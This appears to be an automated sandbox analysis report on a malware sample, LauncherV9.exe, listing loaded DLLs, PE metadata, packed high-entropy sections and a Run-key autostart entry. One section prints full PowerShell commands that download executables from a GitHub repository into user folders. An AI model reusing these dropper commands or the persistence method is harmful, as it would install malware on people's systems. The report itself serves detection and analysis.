Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Service.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Service.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Service.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Service.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Service.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Service.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Service.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Service.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Service.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Service.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Service.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Service.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Service.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Service.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Service.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Service.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Service.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Service.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Service.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Service.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Service.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Service.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Service.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Service.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Service.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Service.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Service.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Service.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Service.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Service.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Service.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Service.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Service.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Service.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Service.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Service.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Service.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Service.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Service.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Service.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Service.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Service.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Service.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Service.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Service.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Service.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Service.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Service.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Service.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Service.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Service.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Service.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Service.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Service.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Service.exe	Section loaded: fwpuclnt.dll

Source: C:\Users\user\Desktop\LauncherV9.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: LauncherV9.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: LauncherV9.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: LauncherV9.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: LauncherV9.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: LauncherV9.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: LauncherV9.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: LauncherV9.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: LauncherV9.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: LauncherV9.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\Users\danar\source\repos\opretorsa\x64\Release\opretorsa.pdb source: LauncherV9.exe
Source:	Binary string: \LoaderV2\ClientLoader\x64\Release\ClientLoader.pdb) source: Service.exe, 00000016.00000000.1448891266.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000016.00000002.2513871933.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000017.00000002.2514078323.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000017.00000000.1545689250.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000018.00000002.2513823440.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000018.00000000.1629513187.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe.18.dr
Source:	Binary string: C:\Users\danar\source\repos\opretorsa\x64\Release\opretorsa.pdb5 source: LauncherV9.exe
Source:	Binary string: \LoaderV2\ClientLoader\x64\Release\ClientLoader.pdb source: Service.exe, 00000016.00000000.1448891266.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000016.00000002.2513871933.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000017.00000002.2514078323.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000017.00000000.1545689250.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000018.00000002.2513823440.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000018.00000000.1629513187.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe.18.dr

Source: LauncherV9.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: LauncherV9.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: LauncherV9.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: LauncherV9.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: LauncherV9.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\zjxbeopkqt\jaclo.exe	Unpacked PE file: 13.2.jaclo.exe.ba0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
Source: C:\Users\user\AppData\Local\dll.exe	Unpacked PE file: 16.2.dll.exe.370000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/mtohpasekfaddd.exe' -OutFile 'C:\zjxbeopkqt\jaclo.exe'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/opyksdkawddd.exe' -OutFile 'C:\Users\user\AppData\Local\dll.exe'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/Service.exe' -OutFile 'C:\Users\user\AppData\Local\Service.exe'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/mtohpasekfaddd.exe' -OutFile 'C:\zjxbeopkqt\jaclo.exe'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/opyksdkawddd.exe' -OutFile 'C:\Users\user\AppData\Local\dll.exe'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/Service.exe' -OutFile 'C:\Users\user\AppData\Local\Service.exe'"

Source: jaclo.exe.12.dr	Static PE information: section name:
Source: jaclo.exe.12.dr	Static PE information: section name:
Source: jaclo.exe.12.dr	Static PE information: section name:
Source: jaclo.exe.12.dr	Static PE information: section name:
Source: jaclo.exe.12.dr	Static PE information: section name:
Source: dll.exe.15.dr	Static PE information: section name:
Source: dll.exe.15.dr	Static PE information: section name:
Source: dll.exe.15.dr	Static PE information: section name:
Source: dll.exe.15.dr	Static PE information: section name:
Source: dll.exe.15.dr	Static PE information: section name:

Source: C:\zjxbeopkqt\jaclo.exe

Code function: 13_2_02DC3B0C push 0000004Ah; ret

13_2_02DC3B16

Source: jaclo.exe.12.dr	Static PE information: section name: entropy: 7.998753579319093
Source: jaclo.exe.12.dr	Static PE information: section name: entropy: 7.9311662605480695
Source: jaclo.exe.12.dr	Static PE information: section name: entropy: 7.984838484844144
Source: jaclo.exe.12.dr	Static PE information: section name: entropy: 7.93829362522864
Source: jaclo.exe.12.dr	Static PE information: section name: .data entropy: 7.979686481510892
Source: dll.exe.15.dr	Static PE information: section name: entropy: 7.9983277202062215
Source: dll.exe.15.dr	Static PE information: section name: entropy: 7.933316038649036
Source: dll.exe.15.dr	Static PE information: section name: entropy: 7.97356418076342
Source: dll.exe.15.dr	Static PE information: section name: entropy: 7.915545219072036
Source: dll.exe.15.dr	Static PE information: section name: .data entropy: 7.985616138613135

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Service.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\zjxbeopkqt\jaclo.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\dll.exe	Jump to dropped file

Source: C:\Users\user\Desktop\LauncherV9.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FileAutostart			Jump to behavior
Source: C:\Users\user\Desktop\LauncherV9.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FileAutostart			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\LauncherV9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LauncherV9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
